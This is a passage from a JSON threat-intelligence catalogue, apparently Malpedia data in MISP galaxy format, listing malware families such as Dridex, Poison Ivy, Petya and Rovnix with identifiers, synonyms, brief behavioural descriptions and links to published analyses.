"value": "Opachki",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://forum.malekal.com/viewtopic.php?t=21806",
"https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519",
"http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
"http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html"
]
}
},
{
"uuid": "495377c4-1be5-4c65-ba66-94c221061415",
"value": "Corebot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf",
"http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/"
]
}
},
{
"uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a",
"value": "systemd",
"description": "General-purpose backdoor",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
]
}
},
{
"uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
"value": "Slempo",
"description": "",
"meta": {
"synonyms": [
"SlemBunk"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html",
"https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html"
]
}
},
{
"uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed",
"value": "DownPaper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/charmingkitten/"
]
}
},
{
"uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e",
"value": "MobiRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/"
]
}
},
{
"uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
"value": "Hajime",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://x86.re/blog/hajime-a-follow-up/",
"http://blog.netlab.360.com/hajime-status-report-en/",
"https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
"https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
"https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
"https://github.com/Psychotropos/hajime_hashes"
]
}
},
{
"uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836",
"value": "DarkShell",
"description": "DarkShell is a DDoS bot, seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food-processing industry.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/"
]
}
},
{
"uuid": "2685ea45-06f4-46e0-9397-eff8844db855",
"value": "murkytop",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
"value": "KevDroid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/",
"https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
]
}
},
{
"uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e",
"value": "Powmet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/"
]
}
},
{
"uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2",
"value": "Luzo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2",
"value": "MILKMAID",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e",
"value": "Dridex",
"description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
"https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/",
"https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
"https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
"https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
"https://viql.github.io/dridex/",
"https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
"https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
]
}
},
{
"uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
"value": "NewsReels",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "88d70171-fc89-44d1-8931-035c0b095247",
"value": "Unidentified 041",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "542161c0-47a4-4297-baca-5ed98386d228",
"value": "Ramnit",
"description": "",
"meta": {
"synonyms": [
"Nimnul"
],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
"http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
"https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
"http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf"
]
}
},
{
"uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722",
"value": "Zyklon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html"
]
}
},
{
"uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8",
"value": "Gratem",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
]
}
},
{
"uuid": "2297799c-f93c-4903-b9af-32b6b599912c",
"value": "GoldDragon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
]
}
},
{
"uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
"value": "Fake Pornhub",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a",
"value": "Herbst",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware"
]
}
},
{
"uuid": "06e0d676-8160-4b65-b6ea-d7634c962809",
"value": "TeleBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
]
}
},
{
"uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
"value": "XOR DDoS",
"description": "Linux DDoS C&C Malware",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf",
"https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
"https://en.wikipedia.org/wiki/Xor_DDoS"
]
}
},
{
"uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f",
"value": "HtBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
"value": "Coinminer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/",
"https://secrary.com/ReversingMalware/CoinMiner/"
]
}
},
{
"uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
"value": "Apocalypse",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/"
]
}
},
{
"uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
"value": "Kwampirs",
"description": "Kwampirs is a family of malware that uses SMB to spread. It typically will not execute or deploy in environments where no publicly available admin$ share exists. It is a fully featured backdoor that can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
]
}
},
{
"uuid": "59c161f4-bb09-4590-9eec-e4d5db3ecb2e",
"value": "win.remy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92",
"value": "Downeks",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3",
"value": "KoobFace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457",
"value": "Tarsip",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a",
"value": "Lyposit",
"description": "",
"meta": {
"synonyms": [
"Lucky Locker",
"Adneukine",
"Bomba Locker"
],
"type": [],
"refs": [
"http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
"https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
"http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html"
]
}
},
{
"uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7",
"value": "Poison Ivy",
"description": "",
"meta": {
"synonyms": [
"pivy",
"poisonivy"
],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
"http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
"https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
"https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii",
"https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/",
"https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
"https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431",
"value": "SAGE",
"description": "",
"meta": {
"synonyms": [
"Saga"
],
"type": [],
"refs": [
"https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
"https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
"http://malware-traffic-analysis.net/2017/10/13/index.html",
"https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
]
}
},
{
"uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9",
"value": "Remsec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
]
}
},
{
"uuid": "a0881a0c-e677-495b-b475-290af09bb716",
"value": "Alma Communicator",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/"
]
}
},
{
"uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f",
"value": "OnlinerSpambot",
"description": "A spambot that has been observed spreading Ursnif, Zeus Panda, Andromeda, or Netflix phishing against Italy and Canada.",
"meta": {
"synonyms": [
"SBot",
"Onliner"
],
"type": [],
"refs": [
"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
]
}
},
{
"uuid": "f64683c8-50ab-42c0-8b90-881598906528",
"value": "Shakti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/"
]
}
},
{
"uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145",
"value": "TabMsgSQL",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8",
"value": "Hermes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
]
}
},
{
"uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa",
"value": "CherryPicker POS",
"description": "",
"meta": {
"synonyms": [
"cherrypicker",
"cherrypickerpos",
"cherry_picker"
],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/"
]
}
},
{
"uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b",
"value": "Ranscam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2016/07/ranscam.html"
]
}
},
{
"uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da",
"value": "ComodoSec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
]
}
},
{
"uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
"value": "Wirenet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
"https://news.drweb.com/show/?i=2679&lng=en&c=14"
]
}
},
{
"uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f",
"value": "Narilam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
"https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
]
}
},
{
"uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22",
"value": "Skygofree",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/",
"https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf"
]
}
},
{
"uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
"value": "MPKBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886",
"value": "prb_backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html"
]
}
},
{
"uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc",
"value": "Petya",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/",
"https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
"https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/"
]
}
},
{
"uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7",
"value": "OnionDuke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002764.html",
"http://contagiodump.blogspot.com/2014/11/onionduke-samples.html"
]
}
},
{
"uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f",
"value": "Rovnix",
"description": "Rovnix is a bootkit consisting of a driver loader (in the VBR) and the 32-bit and 64-bit drivers themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect at least Gozi ISFB, ReactorBot and Rerdom.",
"meta": {
"synonyms": [
"BkLoader",
"Cidox",
"Mayachok"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
"https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
"https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/",
"http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
"https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
"http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html"
]
}
}
],
"version": 1,
"source": "Malpedia",
"name": "Malpedia",
"uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"
}